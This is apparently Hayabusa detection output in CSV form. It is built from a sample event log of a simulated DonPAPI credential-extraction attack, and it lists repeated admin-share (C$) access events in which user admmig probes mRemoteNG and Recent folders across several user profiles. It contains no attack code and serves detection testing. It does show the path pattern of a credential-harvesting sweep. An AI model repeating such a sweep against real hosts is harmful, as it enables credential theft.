2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.013 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.029 
+09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.029 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.045 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.045 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
extraction.evtx 2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.076 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.092 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.092 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.107 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full 
extraction.evtx 2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.141 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.147 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.149 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.150 
+09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.166 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
